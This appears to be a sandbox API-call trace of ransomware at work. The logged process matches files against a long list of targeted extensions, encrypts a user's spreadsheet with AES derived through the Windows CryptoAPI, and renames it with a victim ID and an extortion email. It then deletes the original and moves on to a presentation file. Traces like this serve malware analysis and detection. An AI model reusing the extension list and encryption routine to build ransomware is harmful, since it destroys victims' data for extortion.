	[0186.060] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xlsx") returned=".xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.060] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.060] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.060] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.064] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x5570, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x5570, lpOverlapped=0x0) returned 1
	[0186.067] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.067] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcaef0) returned 1
	[0186.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.069] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.070] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.070] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0186.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.070] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x5570, dwBufLen=0x5570 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x5580) returned 1
	[0186.071] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.071] RtlMoveMemory (in: Destination=0xfe26f8, Source=0xfdd180, Length=0x5570 | out: Destination=0xfe26f8) 
	[0186.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.071] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe26f8*, pdwDataLen=0x18bc0c*=0x5570, dwBufLen=0x5580 | out: pbData=0xfe26f8*, pdwDataLen=0x18bc0c*=0x5580) returned 1
	[0186.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.075] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0186.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.075] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0186.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.076] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0186.076] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.076] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.077] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.078] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0186.078] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.078] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe26f8*, nNumberOfBytesToWrite=0x5580, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe26f8*, lpNumberOfBytesWritten=0x18c068*=0x5580, lpOverlapped=0x0) returned 1
	[0186.082] CloseHandle (hObject=0x2c0) returned 1
	[0186.082] CloseHandle (hObject=0x384) returned 1
	[0186.082] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx")) returned 1
	[0186.091] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx")) returned 0
	[0186.091] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0186.091] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0186.091] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0186.091] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60f2ad70, ftCreationTime.dwHighDateTime=0x1d961fc, ftLastAccessTime.dwLowDateTime=0x24ac2100, ftLastAccessTime.dwHighDateTime=0x1d96bea, ftLastWriteTime.dwLowDateTime=0x24ac2100, ftLastWriteTime.dwHighDateTime=0x1d96bea, nFileSizeHigh=0x0, nFileSizeLow=0x235d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OQPPyb09OdSqs8RB6B.pptx", cAlternateFileName="OQPPYB~1.PPT")) returned 1
	[0186.091] lstrcmpW (lpString1="OQPPyb09OdSqs8RB6B.pptx", lpString2="..") returned 1
	[0186.091] lstrcmpW (lpString1="OQPPyb09OdSqs8RB6B.pptx", lpString2=".") returned 1
	[0186.091] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.092] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="OQPPyb09OdSqs8RB6B.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\OQPPyb09OdSqs8RB6B.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\OQPPyb09OdSqs8RB6B.pptx"
	[0186.092] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\OQPPyb09OdSqs8RB6B.pptx") returned 55
	[0186.092] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.092] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\OQPPyb09OdSqs8RB6B.pptx", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx") returned 0x37
	[0186.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.092] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.092] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx") returned="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx"
	[0186.092] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx") returned 55
	[0186.093] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.093] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0186.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.093] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad